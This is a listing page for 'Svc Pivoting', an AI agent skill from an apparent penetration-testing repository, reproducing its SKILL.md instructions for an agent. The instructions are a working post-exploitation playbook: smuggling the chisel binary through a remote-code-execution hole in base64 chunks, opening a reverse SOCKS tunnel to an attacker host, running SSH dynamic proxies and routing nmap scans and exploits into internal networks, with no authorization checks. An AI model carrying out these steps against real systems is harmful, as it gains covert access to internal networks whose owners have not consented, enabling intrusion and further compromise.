Turn a foothold into a RELIABLE pivot (SOCKS tunnel + persistent shell) so internal volume never rides a fragile stateless RCE. Use the moment you have code-exec on a dual-homed/edge host and need to reach an internal segment. Triggers - dual-homed host, "not reachable from my box", internal CIDR behind a foothold, RCE truncates output, need proxychains/nmap through a host, chisel/ligolo.

  • Markdown instructions

A SKILL.md file the model loads on demand, so it only costs tokens when a request actually matches.

  • Works with any LLM

AI skills are plain Markdown, not provider-specific code, so this works with GPT, Claude, Gemini, Grok, or a local model.

  • Self-contained

Everything the model needs lives in the instructions — no extra files to sync.

  • Open source

Published by s0ld13rr on GitHub. Read the source before you install it.

Installation

Install the Svc Pivoting AI skill in TypingMind to use it with any LLM, or drop it into another agent that reads SKILL.md.

1

Install in TypingMind

TypingMind installs a skill straight from its GitHub folder — it reads SKILL.md, bundles the resource files, and stores the result locally.

  1. Open the app and go to Plugins → Skills.
  2. Choose "Install from GitHub".
  3. Paste the skill folder URL below and confirm.
    https://github.com/s0ld13rr/pentestcode/tree/main/skills/services/pivoting
  4. Enable the skill in any chat where you want it available.
Plugins → Skills → Add skill → From GitHub URL, then paste the folder URL and press Continue.
2

Install in another agent

Any agent that reads the Agent Skills format can use this skill — copy the folder into that agent's skills directory.

Claude Code — .claude/skills
git clone --depth 1 https://github.com/s0ld13rr/pentestcode.git /tmp/pentestcode
mkdir -p .claude/skills
cp -r /tmp/pentestcode/skills/services/pivoting .claude/skills/svc-pivoting
Restart Claude Code after copying so it picks up the new skill.

Use it in TypingMind

Enable Svc Pivoting in any TypingMind chat and the model takes it from there. Its name and description sit in the system prompt, and the moment a request matches, the model loads the full instructions itself — you never invoke it by hand, and it costs no tokens until it is actually used.

The model loads Svc Pivoting on its own as soon as a request matches it.

Works with any AI model

AI skills are plain Markdown instructions rather than provider-specific code, so Svc Pivoting is not tied to the model it was written for. Install it once in TypingMind and use it with GPT-5, Claude, Gemini, Grok, DeepSeek, Mistral, Llama, or a local model you run yourself — all on your own API keys.

  • Loaded only when it is needed

The system prompt carries just the name and description. The instructions are fetched on the first matching request, so an idle skill costs nothing.

  • Switch models mid-chat

Because the skill is instructions rather than code, changing model does not break it — the next model reads the same SKILL.md.

Skill instructions

This is the SKILL.md content the model loads. Read it before installing — a skill is instructions your model will follow.

Pivoting — reliable SOCKS + persistent shell

When this fires

You have code-exec on a host that can reach an internal segment your attacker box cannot (dual-homed edge host, DMZ box). STOP routing volume through the stateless RCE — its output truncates and one wave of concurrent requests can kill it. Stand up a persistent tunnel FIRST, register it, then route all internal scans/exploits through it. Use tunnel_manage action:plan to generate the filled-in recipe; this skill is the methodology + the fallbacks.

Decide the tunnel type

  • ssh -D (dynamic SOCKS) — you have SSH creds/key on the foothold. Simplest, no binary to land. First choice when SSH works.
  • chisel reverse SOCKS — no SSH, but you can exec + reach your attacker IP outbound. Land one static binary, get a full SOCKS5. Default for a web/RCE foothold.
  • ligolo-ng — you need a full route (not just SOCKS) or nested/multi-hop pivots. Route-based (tun iface), cleanest for deep internal work.
  • Reverse shell alone is NOT a pivot — it gives exec, not network reach. Convert to one of the above for internal scanning.

Land the binary through a constrained RCE (the make-or-break)

An egress-restricted / curl-less foothold whose RCE truncates output CANNOT wget chisel. Stage it base64-chunked:

# attacker: fetch static binary (match arch), chunk it single-line-safe
curl -fsSL https://github.com/jpillora/chisel/releases/latest/download/chisel_<ver>_linux_amd64.gz | gunzip > chisel
split -b 2000 <(base64 -w0 chisel) /tmp/ch_
# push each chunk THROUGH the RCE (append; order matters), then reassemble on target:
for f in /tmp/ch_*; do <RCE> "echo -n $(cat "$f") >> /tmp/chisel.b64"; done
<RCE> "base64 -d /tmp/chisel.b64 > /tmp/chisel && chmod +x /tmp/chisel && /tmp/chisel --version"
# node-only foothold (no base64/coreutils): Buffer.from(fs.readFileSync('/tmp/chisel.b64','utf8'),'base64')

Stand it up

# chisel reverse SOCKS — attacker side:
chisel server --reverse --port 8000 --socks5
# foothold side (after staging):
/tmp/chisel client <ATTACKER_IP>:8000 R:9050:socks &
# ssh dynamic SOCKS (if you have creds):
sshpass -p '<pw>' ssh -D 9050 <user>@<foothold> -N -f # or -i key

VERIFY before trusting it (skip this and you'll waste hours on a dead tunnel)

printf 'strict_chain\n[ProxyList]\nsocks5 127.0.0.1 9050\n' > /tmp/pc.conf
proxychains4 -q -f /tmp/pc.conf nmap -sT -Pn -n -p 22,80,445 <internal-host> # a hit = tunnel UP

Then tunnel_manage action:register (record pid + local_port) so sibling agents route via state_query sessions. Re-healthcheck periodically — a dead tunnel silently swallows traffic.

Route internal work through it

  • All internal nmap/curl/exploit: proxychains4 -q -f /tmp/pc.conf <cmd> (SOCKS types) or just target the routed subnet (ligolo).
  • nmap over SOCKS must be -sT -Pn (connect scan; SYN/ping need raw sockets the proxy can't carry).
  • SERIALIZE heavy work through one foothold — don't fan out concurrent agents onto a single tunnel/RCE (it can crash the host).

Pitfalls

  • Pushing a multi-line/binary payload through a truncating RCE without staging → corrupt binary, hours lost. Always chunk+verify.
  • Forgetting --socks5 on chisel server → R:socks has nothing to connect to.
  • proxychains with SYN scan / ICMP ping → all-filtered false negative. Use -sT -Pn.
  • Not registering the tunnel → sibling agents don't know it exists and re-hammer the RCE.
  • Treating a reverse shell as a pivot → you still can't scan the segment. Build SOCKS/route.

Frequently asked questions

What does the Svc Pivoting AI skill do?

Turn a foothold into a RELIABLE pivot (SOCKS tunnel + persistent shell) so internal volume never rides a fragile stateless RCE. Use the moment you have code-exec on a dual-homed/edge host and need to reach an internal segment. Triggers - dual-homed host, "not reachable from my box", internal CIDR behind a foothold, RCE truncates output, need proxychains/nmap through a host, chisel/ligolo.

Why use Svc Pivoting on TypingMind?

Because you install it once and use it with any model. Svc Pivoting is plain Markdown rather than provider-specific code, so the same skill runs on GPT-5, Claude, Gemini, Grok, or a local model — and you can switch model mid-chat without it breaking. TypingMind runs on your own API keys, so you pay providers directly instead of a per-seat subscription, and your skills and chats stay in your own storage.

How do I install Svc Pivoting in TypingMind?

Open Plugins → Skills → Install from GitHub in TypingMind and paste https://github.com/s0ld13rr/pentestcode/tree/main/skills/services/pivoting. TypingMind reads its SKILL.md and installs it as a skill you can enable per chat.

Which AI models can use Svc Pivoting?

Any model you connect in TypingMind. AI skills are plain Markdown instructions rather than provider-specific code, so GPT, Claude, Gemini, Grok, and local models can all load this skill when a request matches it.

How many AI models can I use with Svc Pivoting?

As many as you like. As long as a model supports skills, you can use Svc Pivoting with it — GPT, Claude, Gemini, Grok, DeepSeek, Mistral, Llama and more — all on TypingMind with your own API keys.

Is the Svc Pivoting AI skill free?

Yes. It is published on GitHub by s0ld13rr under the MIT license. You only pay your own AI provider for the tokens you use.

What are AI skills?

An AI skill is a reusable instruction bundle that teaches an AI model how to do one specific task. It follows the open Agent Skills format: a SKILL.md file with a name and description, plus any scripts, templates or reference files the model may need. The model reads the instructions only when your request matches the skill, so an installed skill costs nothing until it is used.

How are AI skills different from plugins or MCP servers?

A plugin or MCP server gives a model new tools to call — code that runs somewhere and returns a result. An AI skill gives the model knowledge and process instead: how to approach a task, which steps to follow, what good output looks like. Skills are plain Markdown, so they need no server, no API key and no runtime, and they work with any model.
